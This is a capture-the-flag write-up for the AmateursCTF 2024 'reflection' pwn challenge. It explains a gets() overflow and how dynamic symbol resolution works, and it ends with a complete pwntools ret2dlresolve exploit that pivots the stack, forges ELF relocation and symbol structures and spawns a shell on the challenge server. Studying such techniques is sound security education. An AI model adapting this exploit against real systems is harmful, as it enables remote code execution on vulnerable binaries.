AmateursCTF2024/pwn/reflection

# pwn/reflection Here is the challenge source code: ```c #include <stdio.h> int main() { char buf[13]; gets(buf); } ``` Clearly, we have a buffer overflow write vulnerability from the use of `gets` function. Running checksec, we get ```shell $ checksec --file=chal RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Partial RELRO No canary found NX enabled No PIE No RPATH RW-RUNPATH 20 Symbols No 0 1 chal ``` showing that both stack canary and PIE is disabled. That means we could easily redirect control flow to anywhere within the binary via return-oriented programming. Ideally, we would be able to redirect our control flow into libc and invoke `system('/bin/sh')`. However, the problem is there is no way we could leak any libc address since there is only a single buffer write. The trick we would used to overcome this is ret2dlresolve. To understand the trick, we first have to understand how dynamic linking on linux works. For that, I actually recommend reading this article - [Understanding _dl_runtime_resolve()](https://ypl.coffee/dl-resolve/) - which actually get into the nitty-gritty details of how the dynamic linker is able locate different structure, or you could read on for my explanation. ## dl_runtime_resolve() Whenever a function from any shared library is called like the `gets` function from libc in our case, we actually first call into the plt stub`gets@plt`: ``` 0000000000401030 <gets@plt>: 401030: ff 25 ca 2f 00 00 jmp *0x2fca(%rip) # 404000 <gets@GLIBC_2.2.5> 401036: 68 00 00 00 00 push $0x0 40103b: e9 e0 ff ff ff jmp 401020 <_init+0x20> ``` This perform an indirect jump to an address loaded from the global offset table entry for gets. Initially, the address stored inside the global offset table entry for gets would be 0x401036 which is the instruction immediately afterwards. In the next instruction, `reloc_index` which in our case is 0x0 is pushed on the stack. This acts as argument to the dynamic linker that tells it which function we would like to resolve. We have to pass it on the stack because registers could have already been used for passing arguments to the actual function call. We then jump to 0x401020: ``` 0000000000401020 <gets@plt-0x10>: 401020: ff 35 ca 2f 00 00 push 0x2fca(%rip) # 403ff0 <_GLOBAL_OFFSET_TABLE_+0x8> 401026: ff 25 cc 2f 00 00 jmp *0x2fcc(%rip) # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10> 40102c: 0f 1f 40 00 nopl 0x0(%rax) ``` This first push the value loaded from `_GLOBAL_OFFSET_TABLE_[1]` onto the stack which contains the `link_map` argument for the dynamic linker. Then we perform an indirect jump to address stored on `_GLOBAL_OFFSET_TABLE_[2]` which points to the actual `dl_runtime_resolve()` function of the dynamic linker. The dynamic linker then goes on to resolve the function we want to call based on `reloc_index` and `link_map` arguments we have provided. The address of the resolved function is then stored back into the global offset table so that we do not have to go throught the same process again the next time we want to call the same function. The important we want to understand is how does the linker figure out which function we want to resolve? This is actually a 3 steps process: 1. `reloc_index` is used to index into an array of `Elf64_Rela` structs with base address found in the `DT_JMPREL` tag in the dynamic section. ```c typedef struct { Elf64_Addr r_offset; /* Address */ Elf64_Xword r_info; /* Relocation type and symbol index */ Elf64_Sxword r_addend; /* Addend */ } Elf64_Rela; ``` We can extract relocation type and symbol index from `r_info` field by the following macros that can be found in /usr/include/elf.h: ```c #define ELF64_R_SYM(i) ((i) >> 32) #define ELF64_R_TYPE(i) ((i) & 0xffffffff) ``` Our relocation type is 7 which is R_X86_64_JUMP_SLOT. Since this is a relocation for a global offset table entry, r_offset points to the address the global offset table entry which in our case is 0x404000. We set `r_addend` to zero since that is unused for our relocation type. 2. The symbol index we get from the `Elf64_Rela` structs is then used to index into an array of `Elf64_Sym` structs with base address found in the `DT_SYMTAB` tag in the dynamic section. ```c typedef struct { Elf64_Word st_name; /* Symbol name (string tbl index) */ unsigned char st_info; /* Symbol type and binding */ unsigned char st_other; /* Symbol visibility */ Elf64_Section st_shndx; /* Section index */ Elf64_Addr st_value; /* Symbol value */ Elf64_Xword st_size; /* Symbol size */ } Elf64_Sym; ``` Again we can extract symbol type and binding from st_info field by the following macros that can be found in /usr/include/elf.h: ```c #define ELF32_ST_BIND(val) (((unsigned char) (val)) >> 4) #define ELF32_ST_TYPE(val) ((val) & 0xf) #define ELF64_ST_BIND(val) ELF32_ST_BIND (val) #define ELF64_ST_TYPE(val) ELF32_ST_TYPE (val) ``` Our symbol type is 2 which is `STT_FUNC` and our symbol binding is 1 which is `STB_GLOBAL` this means that the symbol we are looking at points to a function with global visiblilitty. We set both `st_value` and `st_size` to 0 since we do not actually have a definition the symbol and we want the dynamic linker to search for it in other shared library. 3: Previously, we get a `st_name` field in `Elf64_Sym` struct. This is used as byte offset to index into the string table whose base address, as you may have guessed, comes from `DT_STRTAB` tag in the dynamic section. This points to a null-terminated string which tells the dynamic linker the name of the symbol we want to resolve. **NOTE** You can get the value of tags in dynamic section by running ```shell $ readelf -d chal ``` ## Exploit We want to trick the dynamic linker into resolving the `system` function in libc for us. Our plan is to craft all the relevant data structures at some known address and trick the dynamic linker into using them by carefully controlling `reloc_index` passed on the stack, symbol index stored in `Elf64_Rela` struct and `st_name` field in `Elf64_Sym` struct. This mean that we would need some arbitrary write gadgets. However, the immediate difficulity is that while we can rop to `gets`, there is no gadgets that allow us to set `rdi` register easily which is necessary to pass the address of the buffer we want to read to to `gets`. Upon closer inspection, we see the following snippet of assembly code: ``` 40112e: 48 8d 45 f3 lea -0xd(%rbp),%rax 401132: 48 89 c7 mov %rax,%rdi 401135: b8 00 00 00 00 mov $0x0,%eax 40113a: e8 f1 fe ff ff call 401030 <gets@plt> 40113f: b8 00 00 00 00 mov $0x0,%eax 401144: c9 leave 401145: c3 ret ``` The value `rbp-0xd` is first loaded into `rax` and then moved to `rdi` before calling gets. This means that by controlling `rbp`, we can control `rdi` and hence the first argument to `gets`. The question is how can we set `rbp`? It turns out that immediatly above the saved rip we overwrite while doing ROP, we also have a saved rbp value that is restored by the `leave` instruction before `ret`. The only remaining problem is where do we put the relevant data structures for dynamic linker. This is the result of running `vmmap` with gef while debugging the program: ``` gef➤ vmmap [ Legend: Code | Heap | Stack ] Start End Offset Perm Path 0x0000000000400000 0x0000000000401000 0x0000000000001000 r-- /home/kali/CTF/Amateurs/reflection/reflection/chal 0x0000000000401000 0x0000000000402000 0x0000000000001000 r-x /home/kali/CTF/Amateurs/reflection/reflection/chal 0x0000000000402000 0x0000000000403000 0x0000000000001000 r-- /home/kali/CTF/Amateurs/reflection/reflection/chal 0x0000000000403000 0x0000000000405000 0x0000000000002000 rw- /home/kali/CTF/Amateurs/reflection/reflection/chal 0x00007ffff7fbd000 0x00007ffff7fc1000 0x0000000000004000 r-- [vvar] 0x00007ffff7fc1000 0x00007ffff7fc3000 0x0000000000002000 r-x [vdso] 0x00007ffff7fc3000 0x00007ffff7fc5000 0x0000000000002000 r-- /home/kali/CTF/Amateurs/reflection/reflection/lib/ld-linux-x86-64.so.2 0x00007ffff7fc5000 0x00007ffff7fef000 0x000000000002a000 r-x /home/kali/CTF/Amateurs/reflection/reflection/lib/ld-linux-x86-64.so.2 0x00007ffff7fef000 0x00007ffff7ffa000 0x000000000000b000 r-- /home/kali/CTF/Amateurs/reflection/reflection/lib/ld-linux-x86-64.so.2 0x00007ffff7ffb000 0x00007ffff7fff000 0x0000000000004000 rw- /home/kali/CTF/Amateurs/reflection/reflection/lib/ld-linux-x86-64.so.2 0x00007ffffffde000 0x00007ffffffff000 0x0000000000021000 rw- [stack] gef➤ ``` As we can see, the address from `0x403000` to `0x405000` is usable as it is both readable and writable so we pick some address there. Hence, this the the general flow of our exploit: 1. In the first ROP chain 1. Control the rbp address to point to our selected buffer 2. Return to 0x40112e inside main, 1. This would call gets with our selected buffer so that we could write all the relevant data structures to it 2. The sequence `leave; ret` is executed which will actually perform a stack migration and `rsp` will point to our new buffer which is in `rbp`. This is because `leave` instruction is a actually shorter instruction for `mov rsp, rbp; pop rbp`. This means that we would need to leave some space in our selected buffer to continue crafting our second ROP chain. 2. In the second ROP chain 1. Control the rbp address so that `rbp-0xd` points to a "bin/sh" string which we should have also placed somewhere in our selected buffer 2. Return to 0x401020 with correct `reloc_index` on the stack. 1. This should (re-)resolve the `gets` function to the `system` function in the global offset table. 2. Note that this will actually call `system` with the first argument set to some bogus libc address, which is whatever `rdi` happens to be set to after the previous `gets` call. This does not actually matter as long as `rdi` points to some valid string in memory and we do not get a segmentation fault 3. Return to 0x40112e which will call `gets@plt` with `rbp-0xd` which in our case has been hijacked to mean `system('/bin/sh')`. ## Tuning, Tuning, Tuning The layout near our selected buffer actually looks like so: | Content | Address | | ----------------------- | ------- | | Our data structures | High | | Second ROP chain | | | Reserved for call stack | Low | where the controlled `rbp` value in the first ROP chain is supposed to point between the the second ROP chain and the space reserved for call stack. If we set our `rbp` to too small of a value, we would not have enough space reserved for call stack as we would run into memory mapped read-only below. If we set our `rbp` to too high of a value, we no longer have sufficient space to put our data structures. This as far as I am aware is one of the reason why some people's code may have worked locally but not remotely, as it turns out that the amount of space that needed to be reserved for the call stack may differs from machine to machine. (Maybe somebody will know why?) ## TLDR Stack migration for arbitrary write to craft data structures for ret2dlresolve ## Code ```python= #!/usr/bin/env python3 from pwn import * TUNING = 150 ######### # Setup # ######### context.log_level = "DEBUG" context.binary = binary = "./chal_patched" context.terminal = ["tmux", "split", "-h"] e = ELF(binary) if args.LOCAL: c = gdb.debug(binary) #c = remote("localhost", 5000) else: c = remote("chal.amt.rs", 1344) ################## # Stack Pivoting # ################## BASE = 0x404100 + 0x18 * TUNING payload = b"" payload += b"A" * 13 payload += p64(BASE) payload += p64(0x40112e) payload += b"\n" c.send(payload) ######### # Utils # ######### def get_padding(base : int, alignment : int, address : int) -> bytes: r = (address - base) % alignment if r == 0: return b"" else: return b"A" * (alignment - r) ############################ # Values for ret2dlresolve # ############################ dynstr_section = 0x400470 dynsym_section = 0x4003e0 jmprel_section = 0x400590 # Yes. I am indeed tuning these parameters manually # by checking where the assertion below fails. # Sue me. predict_bin_sh_str = 0x4048d8 + 0x18 * (TUNING - 80) dynstr_offset = 0x3ca8 + 9 * 8 + 0x18 * TUNING dynsym_index = 654 + 3 + TUNING jmprel_index = 637 + 3 + TUNING print(f"dynstr_section = {hex(dynstr_section)}") print(f"dynsym_section = {hex(dynsym_section)}") print(f"jmprel_section = {hex(jmprel_section)}") ######################## # Actual ret2dlresolve # ######################## payload = b"A" * 13 # ROP chain payload += p64(predict_bin_sh_str + 13) payload += p64(0x401020) payload += p64(jmprel_index) payload += p64(0x40112e) payload += p64(0x0) * 7 # "/bin/sh" bin_sh_str = BASE + len(payload) - 13 payload += b"/bin/sh\0" # "system" dynstr = BASE + len(payload) - 13 payload += b"system\0" # dynsym => Elf64_Sym payload += get_padding(dynsym_section, 0x18, BASE + len(payload) - 13) dynsym = BASE + len(payload) - 13 payload += p32(dynstr_offset) # st_name payload += p8(0x12) # st_info payload += p8(0x0) # st_other payload += p16(0x0) # st_shndx payload += p64(0x0) # st_value payload += p64(0x0) # st_size # jmprel => ELF64_Rela payload += get_padding(jmprel_section, 0x18, BASE + len(payload) - 13) jmprel = BASE + len(payload) - 13 payload += p64(e.got["gets"]) # r_offset payload += p64((dynsym_index << 32) | 0x7) # r_info => 0x7 means relocation type R_X86_64_JUMP_SLO payload += p64(0x0) # r_addend payload += b"\n" print(f"bin_sh_str at {hex(bin_sh_str)}") print(f"dynstr at {hex(dynstr)}") print(f"dynsym at {hex(dynsym)}") print(f"jmprel at {hex(jmprel)}") # If assertion failed, change dynstr_offset, dynsym_index, # jmp_index accordingly so that it does not fail. assert predict_bin_sh_str == bin_sh_str assert dynstr == dynstr_section + dynstr_offset assert dynsym == dynsym_section + 0x18 * dynsym_index assert jmprel == jmprel_section + 0x18 * jmprel_index c.send(payload) ########### # Finally # ########### c.interactive() ``` You may need to adjust the `TUNING` parameter.